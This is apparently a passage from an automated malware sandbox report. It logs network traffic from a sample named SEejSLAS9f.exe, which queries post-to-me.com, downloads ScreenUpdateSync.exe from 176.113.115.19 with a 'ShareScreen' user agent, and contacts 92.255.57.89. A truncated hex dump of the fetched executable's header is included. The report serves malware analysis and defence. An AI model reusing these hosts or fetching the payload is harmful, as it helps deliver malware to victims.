                                                            Dec 11, 2024 06:57:03.225306988 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.225357056 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.228852034 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.228919983 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.228955030 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.228996992 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.232547998 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.232559919 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.232605934 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.236103058 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.236160040 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.236238003 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.236284971 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.239747047 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.239818096 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.239844084 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.239888906 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.243388891 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.243438959 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.243451118 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.243491888 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.246997118 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.247054100 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.247121096 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.247164011 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.250600100 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.250653028 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.250710964 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.250751019 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.343223095 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.343235016 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.343405962 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.344660997 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.344712973 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.344747066 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.344793081 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.347912073 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.347961903 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.347965956 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.348009109 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.351202965 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.351253986 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.351366997 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.351414919 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.354499102 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.354546070 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.354582071 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.354631901 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.357733011 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.357785940 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.357819080 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.357868910 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.361061096 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.361135006 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.361149073 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.361198902 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.364315033 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.364365101 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.364438057 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.364485025 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.367613077 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.367657900 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.367759943 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.367808104 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.370935917 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.370986938 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.371026039 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.371073961 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.374263048 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.374311924 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.374346018 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.374387026 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.377479076 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.377533913 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.377666950 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.377710104 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.380745888 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.380798101 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.380860090 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.380902052 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.384047031 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.384114981 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.384171009 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.384217024 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.387334108 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.387387991 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.387485027 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.387526035 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.390660048 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.390718937 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.390777111 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.390821934 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.393917084 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.393975019 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.394007921 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.394049883 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.397223949 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.397269964 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.397331953 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.397377968 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.399916887 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.399940014 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.399966955 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.399996996 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.402483940 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.402542114 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.402604103 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.402647018 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.405129910 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.405179977 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.405268908 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.405312061 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.407820940 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.407888889 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.407932997 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.407975912 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.410429001 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.410465956 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.410517931 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.410530090 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.413096905 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.413156986 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.413196087 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.413239956 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.415641069 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.415698051 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.415738106 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.415786982 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.418334007 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.418384075 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.418423891 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.418467999 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.423335075 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.423346996 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.423409939 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.423553944 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.423603058 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.423676968 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.423722029 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.426178932 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.426254988 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.426273108 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.426340103 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.428831100 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.428889036 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.428936005 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.428986073 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.431502104 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.431560040 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.431588888 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.431638956 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.434093952 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.434144020 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.434207916 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.434268951 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.436753035 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.436810017 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.436863899 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.436913967 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.439352989 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.439395905 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.439472914 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.439529896 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.442042112 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.442086935 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.442111969 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.442137003 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.444667101 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.444731951 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.444797993 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.444845915 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.447262049 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.447326899 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.447393894 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.447438002 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.449924946 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.449987888 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.450047970 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.450093031 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.452548027 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.452603102 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.452662945 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.452709913 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.455157995 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.455234051 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.455281973 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.455353975 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.457798958 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.457861900 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.457880020 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.457926989 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.460453987 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.460520983 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.460566998 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.460617065 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.463140965 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.463156939 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.463200092 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.463228941 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.465727091 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.465795040 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.465818882 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.465864897 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.468355894 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.468411922 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.468466997 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.468521118 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.471003056 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.471070051 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.471100092 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.471147060 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.473673105 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.473718882 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.473754883 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.473779917 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.476274967 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.476329088 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.476356030 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.476402998 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.478905916 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.478965998 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.479036093 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.479082108 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.481547117 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.481597900 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.481657028 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.481702089 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.484188080 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.484244108 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.535173893 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.535228014 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.535259008 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.535283089 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.536096096 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.536149025 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.536159992 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.536201000 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.538393974 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.538449049 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.538460016 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.538496017 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.540615082 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.540668964 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.540761948 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.540815115 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.543034077 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.543092966 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.543190002 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.543240070 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.545042992 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.545099020 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.545145988 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.545191050 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.547306061 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.547368050 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.547379017 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.547434092 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.549541950 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.549588919 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.549644947 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.549696922 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.551723003 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.551778078 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:03.551812887 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:03.551861048 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:05.955655098 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:06.075350046 CET804973292.255.57.89192.168.2.4
                                                            Dec 11, 2024 06:57:06.075998068 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:06.076244116 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:06.195514917 CET804973292.255.57.89192.168.2.4
                                                            Dec 11, 2024 06:57:07.405625105 CET804973292.255.57.89192.168.2.4
                                                            Dec 11, 2024 06:57:07.405685902 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:07.408164978 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:07.527388096 CET804973292.255.57.89192.168.2.4
                                                            Dec 11, 2024 06:57:07.821131945 CET8049731176.113.115.19192.168.2.4
                                                            Dec 11, 2024 06:57:07.827950001 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:57:07.855370998 CET804973292.255.57.89192.168.2.4
                                                            Dec 11, 2024 06:57:07.856254101 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:12.857558012 CET804973292.255.57.89192.168.2.4
                                                            Dec 11, 2024 06:57:12.859998941 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:57:56.754287004 CET4973280192.168.2.492.255.57.89
                                                            Dec 11, 2024 06:58:48.660131931 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:58:49.031645060 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:58:49.640930891 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:58:50.844053984 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:58:53.344084978 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:58:58.156582117 CET4973180192.168.2.4176.113.115.19
                                                            Dec 11, 2024 06:59:07.772145033 CET4973180192.168.2.4176.113.115.19
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 11, 2024 06:56:58.696532011 CET5985053192.168.2.41.1.1.1
                                                            Dec 11, 2024 06:56:58.928354979 CET53598501.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 11, 2024 06:56:58.696532011 CET192.168.2.41.1.1.10x77f7Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 11, 2024 06:56:58.928354979 CET1.1.1.1192.168.2.40x77f7No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                            Dec 11, 2024 06:56:58.928354979 CET1.1.1.1192.168.2.40x77f7No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                            • post-to-me.com
                                                            • 176.113.115.19
                                                            • 92.255.57.89
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449731176.113.115.19807732C:\Users\user\Desktop\SEejSLAS9f.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 11, 2024 06:57:01.250897884 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                            User-Agent: ShareScreen
                                                            Host: 176.113.115.19
                                                            Dec 11, 2024 06:57:02.574893951 CET1236INHTTP/1.1 200 OK
                                                            Date: Wed, 11 Dec 2024 05:57:02 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Last-Modified: Wed, 11 Dec 2024 05:45:01 GMT
                                                            ETag: "4a400-628f819509315"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 304128
                                                            Content-Type: application/x-msdos-program
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 4b a7 de a0 2a c9 8d a0 2a c9 8d a0 2a c9 8d be 78 4d 8d bc 2a c9 8d be 78 5c 8d b4 2a c9 8d be 78 4a 8d f8 2a c9 8d 87 ec b2 8d ab 2a c9 8d a0 2a c8 8d ca 2a c9 8d be 78 43 8d a1 2a c9 8d be 78 5d 8d a1 2a c9 8d be 78 58 8d a1 2a c9 8d 52 69 63 68 a0 2a c9 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b7 fe df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 7e 9d 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$K***xM*x\*xJ****xC*x]*xX*Rich*PELd?@ B~'dA0l.text `.rdataj "@@.data=@l@.rsrc0A@@
                                                            Dec 11, 2024 06:57:02.574912071 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 58 10 43 00 3b 0d 04 40 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 40 25 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d
                                                            Data Ascii: %XC;@Cujh@%Cutu=uCjYeVYEtVPYYE}u7ujYVj5jCCuCPmYUQeVEPuu/u9Et
                                                            Dec 11, 2024 06:57:02.574930906 CET1236INData Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78
